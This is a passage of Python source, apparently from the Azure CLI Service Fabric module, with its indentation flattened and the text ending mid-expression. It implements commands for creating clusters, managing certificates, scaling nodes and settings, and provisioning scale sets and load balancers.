from azure.cli.core.util import CLIError, get_file_json, b64_to_hex, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac import GraphRbacManagementClient
from azure.cli.core.profiles import ResourceType, get_sdk, get_api_version
from azure.keyvault import KeyVaultAuthentication, KeyVaultClient
from azure.cli.command_modules.servicefabric._arm_deployment_utils import validate_and_deploy_arm_template
from azure.cli.command_modules.servicefabric._sf_utils import _get_resource_group_by_name, _create_resource_group_name
from azure.mgmt.servicefabric.models import (ClusterUpdateParameters,
ClientCertificateThumbprint,
ClientCertificateCommonName,
SettingsSectionDescription,
SettingsParameterDescription,
NodeTypeDescription,
EndpointRangeDescription)
from azure.mgmt.network.models import (PublicIPAddress,
Subnet,
SubResource as NetworkSubResource,
InboundNatPool,
Probe,
PublicIPAddressDnsSettings,
LoadBalancer,
FrontendIPConfiguration,
BackendAddressPool,
LoadBalancingRule)
from azure.mgmt.compute.models import (VaultCertificate,
Sku as ComputeSku,
UpgradePolicy,
ImageReference,
ApiEntityReference,
VaultSecretGroup,
VirtualMachineScaleSetOSDisk,
VirtualMachineScaleSetVMProfile,
VirtualMachineScaleSetExtensionProfile,
VirtualMachineScaleSetOSProfile,
VirtualMachineScaleSetStorageProfile,
VirtualMachineScaleSet,
VirtualMachineScaleSetNetworkConfiguration,
VirtualMachineScaleSetIPConfiguration,
VirtualMachineScaleSetNetworkProfile,
SubResource,
UpgradeMode)
from azure.mgmt.storage.models import StorageAccountCreateParameters
from knack.log import get_logger
from ._client_factory import (resource_client_factory,
keyvault_client_factory,
compute_client_factory,
storage_client_factory,
network_client_factory)
logger = get_logger(__name__)
DEFAULT_ADMIN_USER_NAME = "adminuser"
DEFAULT_SKU = "Standard_D2_V2"
DEFAULT_TIER = "Standard"
DEFAULT_OS = "WindowsServer2016Datacenter"
DEFAULT_CLUSTER_SIZE = 5
DEFAULT_DURABILITY_LEVEL = "Bronze"
DEFAULT_APPLICATION_START_PORT = 20000
DEFAULT_APPLICATION_END_PORT = 30000
DEFAULT_EPHEMERAL_START = 49152
DEFAULT_EPHEMERAL_END = 65534
DEFAULT_CLIENT_CONNECTION_ENDPOINT = 19000
DEFAULT_HTTP_GATEWAY_ENDPOINT = 19080
DEFAULT_TCP_PORT = 19000
DEFAULT_HTTP_PORT = 19080
DEFAULT_FRONTEND_PORT_RANGE_START = 3389
DEFAULT_FRONTEND_PORT_RANGE_END = 4500
DEFAULT_BACKEND_PORT = 3389
SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME = "servicefabricnode"
SERVICE_FABRIC_LINUX_NODE_EXT_NAME = "servicefabriclinuxnode"
SOURCE_VAULT_VALUE = "sourceVaultValue"
CERTIFICATE_THUMBPRINT = "certificateThumbprint"
CERTIFICATE_URL_VALUE = "certificateUrlValue"
SEC_SOURCE_VAULT_VALUE = "secSourceVaultValue"
SEC_CERTIFICATE_THUMBPRINT = "secCertificateThumbprint"
SEC_CERTIFICATE_URL_VALUE = "secCertificateUrlValue"
os_dic = {'WindowsServer2012R2Datacenter': '2012-R2-Datacenter',
'UbuntuServer1604': '16.04-LTS',
'WindowsServer2016DatacenterwithContainers': '2016-Datacenter-with-Containers',
'WindowsServer2016Datacenter': '2016-Datacenter',
'WindowsServer1709': "Datacenter-Core-1709-smalldisk",
'WindowsServer1709withContainers': "Datacenter-Core-1709-with-Containers-smalldisk",
'WindowsServer1803withContainers': "Datacenter-Core-1803-with-Containers-smalldisk",
'WindowsServer1809withContainers': "Datacenter-Core-1809-with-Containers-smalldisk",
'WindowsServer2019Datacenter': "2019-Datacenter",
'WindowsServer2019DatacenterwithContainers': "2019-Datacenter-Core-with-Containers"}
def list_cluster(client, resource_group_name=None):
cluster_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return cluster_list
# pylint:disable=too-many-locals, too-many-statements, too-many-boolean-expressions, too-many-branches
def new_cluster(cmd,
client,
resource_group_name,
location,
certificate_subject_name=None,
parameter_file=None,
template_file=None,
cluster_name=None,
vault_resource_group_name=None,
vault_name=None,
certificate_file=None,
certificate_password=None,
certificate_output_folder=None,
secret_identifier=None,
vm_user_name=None,
vm_password=None,
cluster_size=None,
vm_sku=None,
vm_os=None):
cli_ctx = cmd.cli_ctx
if certificate_subject_name is None and certificate_file is None and secret_identifier is None:
raise CLIError(
'\'--certificate-subject-name\', \'--certificate-file\', \'--secret-identifier\', one of them must be specified')
if certificate_output_folder and certificate_file:
raise CLIError(
'\'--certificate-output-folder\' and \'--certificate-file\' can not be specified at same time')
if secret_identifier:
if certificate_output_folder or certificate_file or certificate_output_folder or vault_resource_group_name or certificate_password:
raise CLIError(
'\'--certificate-output-folder\' , \'--certificate-file\', \'certificate_output_folder\', \'vault_resource_group_name\', \'certificate_password\' can not be specified, ' +
'when \'--secret-identifier\' is specified')
if parameter_file or template_file:
if parameter_file is None or template_file is None:
raise CLIError('If using customize template to deploy,both \'--parameter-file\' and \'--template-file\' can not be None ' + '\n For example:\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json' +
'\n az sf cluster create --resource-group myRg --location westus --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate_file c:\\test.pfx' + '\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate-output-folder c:\\certoutput')
if cluster_size or vm_sku or vm_user_name:
raise CLIError('\'cluster_size\',\'vm_sku\',\'vm_os\',\'vm_user_name\' can not be specified when using customize template deployment')
else:
if vm_password is None:
raise CLIError('\'--vm-password\' could not be None')
if cluster_size is None:
cluster_size = DEFAULT_CLUSTER_SIZE
if vm_sku is None:
vm_sku = DEFAULT_SKU
if vm_os is None:
vm_os = DEFAULT_OS
if vm_user_name is None:
vm_user_name = DEFAULT_ADMIN_USER_NAME
rg = _get_resource_group_by_name(cli_ctx, resource_group_name)
if rg is None:
_create_resource_group_name(cli_ctx, resource_group_name, location)
if vault_name is None:
vault_name = resource_group_name
name = ""
for n in vault_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
if len(name) >= 21:
break
vault_name = name
if vault_resource_group_name is None:
vault_resource_group_name = resource_group_name
if cluster_name is None:
cluster_name = resource_group_name
if certificate_file:
_, file_extension = os.path.splitext(certificate_file)
if file_extension is None or file_extension.lower() != '.pfx'.lower():
raise CLIError('\'--certificate_file\' should be a valid pfx file')
vault_id = None
certificate_uri = None
cert_thumbprint = None
output_file = None
if parameter_file is None:
vm_os = os_dic[vm_os]
reliability_level = _get_reliability_level(cluster_size)
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
vault_id = result[0]
certificate_uri = result[1]
cert_thumbprint = result[2]
output_file = result[3]
linux = None
if vm_os == '16.04-LTS':
linux = True
template = _modify_template(linux)
parameters = _set_parameters_for_default_template(cluster_location=location,
cluster_name=cluster_name,
admin_password=vm_password,
certificate_thumbprint=cert_thumbprint,
vault_id=vault_id,
certificate_id=certificate_uri,
reliability_level=reliability_level,
admin_name=vm_user_name,
cluster_size=cluster_size,
durability_level=DEFAULT_DURABILITY_LEVEL,
vm_sku=vm_sku,
os_type=vm_os,
linux=linux)
else:
parameters, output_file = _set_parameters_for_customize_template(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier,
parameter_file)
vault_id = parameters[SOURCE_VAULT_VALUE]['value']
certificate_uri = parameters[CERTIFICATE_URL_VALUE]['value']
cert_thumbprint = parameters[CERTIFICATE_THUMBPRINT]['value']
template = get_file_json(template_file)
validate_and_deploy_arm_template(cmd, resource_group_name, template, parameters)
output_dict = {}
output_dict['vm_user_name'] = vm_user_name
output_dict['cluster'] = client.get(resource_group_name, cluster_name)
output_dict['certificate'] = {'certificate_file': output_file,
'vault_id': vault_id,
'certificate_identifier': certificate_uri,
'thumbprint': cert_thumbprint}
return output_dict
def _build_detailed_error(top_error, output_list):
if output_list:
output_list.append(' Inner Error - Code: "{}" Message: "{}"'.format(top_error.code, top_error.message))
else:
output_list.append('Error - Code: "{}" Message: "{}"'.format(top_error.code, top_error.message))
if top_error.details:
for error in top_error.details:
_build_detailed_error(error, output_list)
return output_list
def add_app_cert(cmd,
client,
resource_group_name,
cluster_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
cli_ctx = cmd.cli_ctx
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
_add_cert_to_all_vmss(cli_ctx, resource_group_name, None, result[0], result[1])
return client.get(resource_group_name, cluster_name)
def add_client_cert(client,
resource_group_name,
cluster_name,
is_admin=False,
thumbprint=None,
certificate_common_name=None,
certificate_issuer_thumbprint=None,
admin_client_thumbprints=None,
readonly_client_thumbprints=None,
client_certificate_common_names=None):
if thumbprint:
if certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names:
raise CLIError(
"--thumbprint can only specified alone or with --is-admin")
if certificate_common_name or certificate_issuer_thumbprint:
if certificate_issuer_thumbprint is None or certificate_common_name is None:
raise CLIError(
"Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
if thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names or is_admin:
raise CLIError(
"Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
if admin_client_thumbprints or readonly_client_thumbprints:
if thumbprint or certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names or is_admin:
raise CLIError(
"Only \'--admin-client-thumbprints\' and \'--readonly-client-thumbprints\' can be specified together")
if client_certificate_common_names:
if is_admin or thumbprint or certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints: # pylint: disable=too-many-boolean-expressions
raise CLIError(
"\'--client-certificate-commonNames\' can only be specified alone")
cluster = client.get(resource_group_name, cluster_name)
def _add_thumbprint(cluster, is_admin, thumbprint):
remove = []
for t in cluster.client_certificate_thumbprints:
if t.certificate_thumbprint.lower() == thumbprint.lower():
remove.append(t)
for t in remove:
cluster.client_certificate_thumbprints.remove(t)
cluster.client_certificate_thumbprints.append(
ClientCertificateThumbprint(is_admin, thumbprint))
def _add_common_name(cluster, is_admin, certificate_common_name, certificate_issuer_thumbprint):
for t in cluster.client_certificate_common_names:
if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_common_names.remove(remove)
cluster.client_certificate_common_names.add(ClientCertificateCommonName(
is_admin, certificate_common_name, certificate_issuer_thumbprint))
return cluster.client_certificate_common_names
if thumbprint:
_add_thumbprint(cluster, is_admin, thumbprint)
if admin_client_thumbprints or readonly_client_thumbprints:
if admin_client_thumbprints:
for t in admin_client_thumbprints:
_add_thumbprint(cluster, True, t)
if readonly_client_thumbprints:
for t in readonly_client_thumbprints:
_add_thumbprint(cluster, False, t)
if certificate_common_name:
_add_common_name(cluster, is_admin, certificate_common_name,
certificate_issuer_thumbprint)
if client_certificate_common_names:
for common_name in client_certificate_common_names:
if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name and 'isAdmin' in common_name:
cluster.client_certificate_common_names = _add_common_name(
cluster, common_name['isAdmin'], common_name['certificateCommonName'], common_name['certificateIssuerThumbprint'])
else:
raise CLIError('client_certificate_common_names is invalid')
patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
client_certificate_common_names=cluster.client_certificate_common_names)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_client_cert(client,
resource_group_name,
cluster_name,
thumbprints=None,
certificate_common_name=None,
certificate_issuer_thumbprint=None,
client_certificate_common_names=None):
if thumbprints:
if certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names:
raise CLIError("--thumbprint can only specified alone")
if certificate_common_name or certificate_issuer_thumbprint:
if certificate_issuer_thumbprint is None or certificate_common_name is None:
raise CLIError(
"Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
if thumbprints or client_certificate_common_names:
raise CLIError(
"Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
if client_certificate_common_names:
if thumbprints or certificate_common_name or certificate_issuer_thumbprint:
raise CLIError(
"\'--client-certificate-commonNames\' can only be specified alone")
cluster = client.get(resource_group_name, cluster_name)
def _remove_thumbprint(cluster, thumbprint):
remove = None
for t in cluster.client_certificate_thumbprints:
if t.certificate_thumbprint.lower() == thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_thumbprints.remove(remove)
return cluster.client_certificate_thumbprints
def _remove_common_name(cluster, certificate_common_name, certificate_issuer_thumbprint):
remove = None
for t in cluster.client_certificate_common_names:
if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_common_names.remove(remove)
return cluster.certificate_issuer_thumbprint
if isinstance(thumbprints, list) is False:
_remove_thumbprint(cluster, thumbprints)
if isinstance(thumbprints, list) is True:
for t in thumbprints:
cluster.client_certificate_thumbprints = _remove_thumbprint(
cluster, t)
if certificate_common_name:
_remove_common_name(cluster, certificate_common_name,
certificate_issuer_thumbprint)
if client_certificate_common_names:
for common_name in client_certificate_common_names:
if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name:
cluster.client_certificate_common_names = _remove_common_name(cluster,
common_name['certificateCommonName'],
common_name['certificateIssuerThumbprint'])
else:
raise CLIError('client_certificate_common_names is invalid')
patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
client_certificate_common_names=cluster.client_certificate_common_names)
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_cert(cmd,
client,
resource_group_name,
cluster_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
cli_ctx = cmd.cli_ctx
cluster = client.get(resource_group_name, cluster_name)
if cluster.certificate is None:
raise CLIError("Unsecure cluster is not allowed to add certificate")
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
vault_id = result[0]
secret_url = result[1]
thumbprint = result[2]
compute_client = compute_client_factory(cli_ctx)
primary_node_type = [n for n in cluster.node_types if n.is_primary is True][0]
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, primary_node_type.name)
fabric_ext = _get_sf_vm_extension(vmss)
if fabric_ext is None:
raise CLIError("Failed to find service fabric extension")
# add cert and star vmss update
_add_cert_to_all_vmss(cli_ctx, resource_group_name, cluster.cluster_id, vault_id, secret_url, is_cluster_cert=True, thumbprint=thumbprint)
# cluser update
patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
patch_request.certificate.thumbprint_secondary = thumbprint
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_cert(client, resource_group_name, cluster_name, thumbprint):
cluster = client.get(resource_group_name, cluster_name)
if cluster.certificate is None:
raise CLIError("Unsecure cluster is not allowed to remove certificate")
if cluster.certificate.thumbprint_secondary.lower() == thumbprint.lower():
cluster.certificate.thumbprint_secondary = None
else:
if cluster.certificate.thumbprint.lower() == thumbprint.lower():
cluster.certificate.thumbprint = cluster.certificate.thumbprint_secondary
cluster.certificate.thumbprint_secondary = None
else:
raise CLIError(
"Unable to find the certificate with the thumbprint {} in the cluster".format(thumbprint))
patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
patch_request.certificate = cluster.certificate
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node(cmd, client, resource_group_name, cluster_name, node_type, number_of_nodes_to_add):
cli_ctx = cmd.cli_ctx
number_of_nodes_to_add = int(number_of_nodes_to_add)
if number_of_nodes_to_add <= 0:
raise CLIError("--number-of-nodes-to-add must be greater than 0")
compute_client = compute_client_factory(cli_ctx)
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
vmss.sku.capacity = vmss.sku.capacity + number_of_nodes_to_add
# update vmss
vmss_poll = compute_client.virtual_machine_scale_sets.begin_create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
# update cluster
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_node(cmd, client, resource_group_name, cluster_name, node_type, number_of_nodes_to_remove):
cli_ctx = cmd.cli_ctx
number_of_nodes_to_remove = int(number_of_nodes_to_remove)
if number_of_nodes_to_remove <= 0:
raise CLIError("--number-of-nodes-to-remove must be greater than 0")
compute_client = compute_client_factory(cli_ctx)
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
reliability_required_instance_count = _get_target_instance(cluster.reliability_level)
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
vmss.sku.capacity = vmss.sku.capacity - number_of_nodes_to_remove
if vmss.sku.capacity < reliability_required_instance_count:
raise CLIError("Can't delete node since current reliability level is {} requires at least {} nodes.".format(
cluster.reliability_level,
reliability_required_instance_count))
# update vmss
vmss_poll = compute_client.virtual_machine_scale_sets.begin_create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
# update cluster
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_durability(cmd, client, resource_group_name, cluster_name, node_type, durability_level):
cli_ctx = cmd.cli_ctx
# get cluster node type durablity
cluster = client.get(resource_group_name, cluster_name)
node_type_refs = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if not node_type_refs:
raise CLIError("Failed to find the node type in the cluster.")
node_type_ref = node_type_refs[0]
curr_node_type_durability = node_type_ref.durability_level
# get vmss extension durability
compute_client = compute_client_factory(cli_ctx)
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type)
_get_sf_vm_extension(vmss)
fabric_ext_ref = _get_sf_vm_extension(vmss)
if fabric_ext_ref is None:
raise CLIError("Failed to find service fabric extension.")
curr_vmss_durability_level = fabric_ext_ref.settings['durabilityLevel']
# check upgrade
if curr_node_type_durability.lower() != curr_vmss_durability_level.lower():
logger.warning(
"The durability level is currently mismatched between the cluster ('%s') and the VM extension ('%s').",
curr_node_type_durability,
curr_vmss_durability_level)
# update cluster node type durability
if curr_node_type_durability.lower() != durability_level.lower():
node_type_ref.durability_level = durability_level
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
update_cluster_poll = client.update(resource_group_name, cluster_name, patch_request)
LongRunningOperation(cli_ctx)(update_cluster_poll)
# update vmss sf extension durability
if curr_vmss_durability_level.lower() != durability_level.lower():
fabric_ext_ref.settings['durabilityLevel'] = durability_level
fabric_ext_ref.settings['enableParallelJobs'] = True
vmss_poll = compute_client.virtual_machine_scale_sets.begin_create_or_update(resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
return client.get(resource_group_name, cluster_name)
def update_cluster_upgrade_type(client,
resource_group_name,
cluster_name,
upgrade_mode,
version=None):
if upgrade_mode.lower() != 'manual' and upgrade_mode.lower() != 'automatic':
raise CLIError(
'--upgrade-mode can either be \'manual\' or \'automatic\'')
cluster = client.get(resource_group_name, cluster_name)
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
if upgrade_mode.lower() == 'manual':
if version is None:
raise CLIError(
'When \'--upgrade-mode\' set to \'manual\', --version must be given')
patch_request.cluster_code_version = version
patch_request.upgrade_mode = upgrade_mode
return client.update(resource_group_name, cluster_name, patch_request)
def set_cluster_setting(client,
resource_group_name,
cluster_name,
section=None,
parameter=None,
value=None,
settings_section_description=None):
def _set(setting_dict, section, parameter, value):
if section not in setting_dict:
setting_dict[section] = {}
setting_dict[section][parameter] = value
return setting_dict
if settings_section_description and (section or parameter or value):
raise CLIError(
'Only can use either \'--settings-section-description\' or \'--section\', \'--parameter\' and \'--value\' to set the settings')
if section or parameter or value:
if section is None or parameter is None or value is None:
raise CLIError(
'\'--section\' , \'--parameter\' and \'--value\' can not be None')
cluster = client.get(resource_group_name, cluster_name)
setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
if settings_section_description:
for setting in settings_section_description:
if 'section' in setting and 'parameter' in setting and 'value' in setting:
setting_dict = _set(setting_dict, setting['section'],
setting['parameter'], setting['value'])
else:
raise CLIError('settings_section_description is invalid')
else:
setting_dict = _set(setting_dict, section, parameter, value)
settings = _dict_to_fabric_settings(setting_dict)
patch_request = ClusterUpdateParameters(fabric_settings=settings)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_setting(client,
resource_group_name,
cluster_name,
section=None,
parameter=None,
settings_section_description=None):
def _remove(setting_dict, section, parameter):
if section not in setting_dict:
raise CLIError(
"Can't find the section {} in the settings".format(section))
if parameter not in setting_dict[section]:
raise CLIError(
"Can't find the parameter {} in the settings".format(parameter))
del setting_dict[section][parameter]
return setting_dict
if settings_section_description and (section or parameter):
raise CLIError(
'Only can use either \'--settings-section-description\' or \'--section\' and \'--parameter \' to set the settings')
cluster = client.get(resource_group_name, cluster_name)
setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
if settings_section_description:
for setting in settings_section_description:
if 'section' in setting and 'parameter' in setting:
setting_dict = _remove(setting_dict, setting['section'], setting['parameter'])
else:
raise CLIError('settings_section_description is invalid')
else:
setting_dict = _remove(setting_dict, section, parameter)
settings = _dict_to_fabric_settings(setting_dict)
patch_request = ClusterUpdateParameters(fabric_settings=settings)
return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_reliability_level(cmd,
client,
resource_group_name,
cluster_name, reliability_level,
auto_add_node=False):
cli_ctx = cmd.cli_ctx
reliability_level = reliability_level.lower()
cluster = client.get(resource_group_name, cluster_name)
instance_now = _get_target_instance(cluster.reliability_level)
instance_target = _get_target_instance(reliability_level)
node_types = [n for n in cluster.node_types if n.is_primary]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
compute_client = compute_client_factory(cli_ctx)
vmss = _get_cluster_vmss_by_node_type(compute_client, resource_group_name, cluster.cluster_id, node_type.name)
if instance_target == instance_now:
return cluster
if instance_target > instance_now:
if vmss.sku.capacity < instance_target:
if auto_add_node is not True:
raise CLIError('Please use --auto_add_node to automatically increase the nodes,{} requires {} nodes, but currenty there are {}'.
format(reliability_level, instance_target, vmss.sku.capacity))
vmss.sku.capacity = instance_target
vmss_poll = compute_client.virtual_machine_scale_sets.begin_create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(
node_types=cluster.node_types, reliability_level=reliability_level)
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node_type(cmd,
client,
resource_group_name,
cluster_name,
node_type,
capacity,
vm_user_name,
vm_password,
vm_sku=DEFAULT_SKU,
vm_tier=DEFAULT_TIER,
durability_level=DEFAULT_DURABILITY_LEVEL):
if durability_level.lower() == 'gold':
if vm_sku.lower() != 'standard_d15_v2' and vm_sku.lower() != 'standard_g5':
raise CLIError(
'Only Standard_D15_v2 and Standard_G5 supports Gold durability, please specify --vm-sku to right value')
cluster = client.get(resource_group_name, cluster_name)
if any(n for n in cluster.node_types if n.name.lower() == node_type):
raise CLIError("node type {} already exists in the cluster".format(node_type))
_create_vmss(cmd, resource_group_name, cluster_name, cluster, node_type, durability_level, vm_password, vm_user_name, vm_sku, vm_tier, capacity)
_add_node_type_to_sfrp(cmd, client, resource_group_name, cluster_name, cluster, node_type, capacity, durability_level)
return client.get(resource_group_name, cluster_name)
def _add_node_type_to_sfrp(cmd, client, resource_group_name, cluster_name, cluster, node_type_name, capacity, durability_level):
cluster.node_types.append(NodeTypeDescription(name=node_type_name,
client_connection_endpoint_port=DEFAULT_CLIENT_CONNECTION_ENDPOINT,
http_gateway_endpoint_port=DEFAULT_HTTP_GATEWAY_ENDPOINT,
is_primary=False,
vm_instance_count=int(capacity),
durability_level=durability_level,
application_ports=EndpointRangeDescription(
start_port=DEFAULT_APPLICATION_START_PORT, end_port=DEFAULT_APPLICATION_END_PORT),
ephemeral_ports=EndpointRangeDescription(
start_port=DEFAULT_EPHEMERAL_START, end_port=DEFAULT_EPHEMERAL_END)))
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
poller = client.update(resource_group_name, cluster_name, patch_request)
LongRunningOperation(cmd.cli_ctx)(poller)
def _create_vmss(cmd, resource_group_name, cluster_name, cluster, node_type_name, durability_level, vm_password, vm_user_name, vm_sku, vm_tier, capacity):
cli_ctx = cmd.cli_ctx
subnet_name = "subnet_{}".format(1)
network_client = network_client_factory(cli_ctx)
location = _get_resource_group_by_name(cli_ctx, resource_group_name).location
virtual_network = list(
network_client.virtual_networks.list(resource_group_name))[0]
subnets = list(network_client.subnets.list(
resource_group_name, virtual_network.name))
address_prefix = None
index = None
for x in range(1, 255):
address_prefix = '10.0.{}.0/24'.format(x)
index = x
found = False
for s in subnets:
if address_prefix == s.address_prefix:
found = True
if subnet_name.lower() == s.name.lower():
subnet_name = "subnet_{}".format(x)
if found is False:
break
if address_prefix is None:
raise CLIError("Failed to generate the address prefix")
poller = network_client.subnets.begin_create_or_update(resource_group_name,
virtual_network.name,
subnet_name,
Subnet(address_prefix=address_prefix))
subnet = LongRunningOperation(cli_ctx)(poller)
public_address_name = 'LBIP-{}-{}{}'.format(
cluster_name.lower(), node_type_name.lower(), index)
dns_label = '{}-{}{}'.format(cluster_name.lower(),
node_type_name.lower(), index)
lb_name = 'LB-{}-{}{}'.format(cluster_name.lower(),
node_type_name.lower(), index)
if len(lb_name) >= 24:
lb_name = '{}{}'.format(lb_name[0:21], index)
poller = network_client.public_ip_addresses.begin_create_or_update(resource_group_name,
public_address_name,
PublicIPAddress(public_ip_allocation_method='Dynamic',
location=location,
dns_settings=PublicIPAddressDnsSettings(domain_name_label=dns_label)))
publicIp = LongRunningOperation(cli_ctx)(poller)
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cli_ctx)
new_load_balancer_id = '/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}'.format(
subscription_id, resource_group_name, lb_name)
backend_address_poll_name = "LoadBalancerBEAddressPool"
frontendip_configuration_name = "LoadBalancerIPConfig"
probe_name = "FabricGatewayProbe"
probe_http_name = "FabricHttpGatewayProbe"
inbound_nat_pools_name = "LoadBalancerBEAddressNatPool"
new_load_balancer = LoadBalancer(id=new_load_balancer_id,
location=location,
frontend_ip_configurations=[FrontendIPConfiguration(name=frontendip_configuration_name,
public_ip_address=PublicIPAddress(id=publicIp.id))],
backend_address_pools=[BackendAddressPool(
name=backend_address_poll_name)],
load_balancing_rules=[LoadBalancingRule(name='LBRule',
backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.
format(subscription_id,
resource_group_name,
lb_name,
backend_address_poll_name)),
backend_port=DEFAULT_TCP_PORT,
enable_floating_ip=False,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port=DEFAULT_TCP_PORT,
idle_timeout_in_minutes=5,
protocol='tcp',
probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
resource_group_name,
lb_name,
probe_name))),
LoadBalancingRule(name='LBHttpRule',
backend_address_pool=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/backendAddressPools/{}'.format(subscription_id,
resource_group_name,
lb_name,
backend_address_poll_name)),
backend_port=DEFAULT_HTTP_PORT,
enable_floating_ip=False,
frontend_ip_configuration=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/frontendIPConfigurations/{}'.format(subscription_id,
resource_group_name,
lb_name,
frontendip_configuration_name)),
frontend_port=DEFAULT_HTTP_PORT,
idle_timeout_in_minutes=5,
protocol='tcp',
probe=NetworkSubResource(id='/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/probes/{}'.format(subscription_id,
resource_group_name,
lb_name,
probe_http_name)))],
probes=[Probe(protocol='tcp',
name=probe_name,
interval_in_seconds=5,
number_of_probes=2,
port=DEFAULT_TCP_PORT),
Probe(protocol='tcp',
name=probe_http_name,
interval_in_seconds=5,
number_of_probes=2,
port=DEFAULT_HTTP_PORT)],
inbound_nat_pools=[InboundNatPool(protocol='tcp',
name=inbound_nat_pools_name,
backend_port=DEFAULT_BACKEND_PORT,
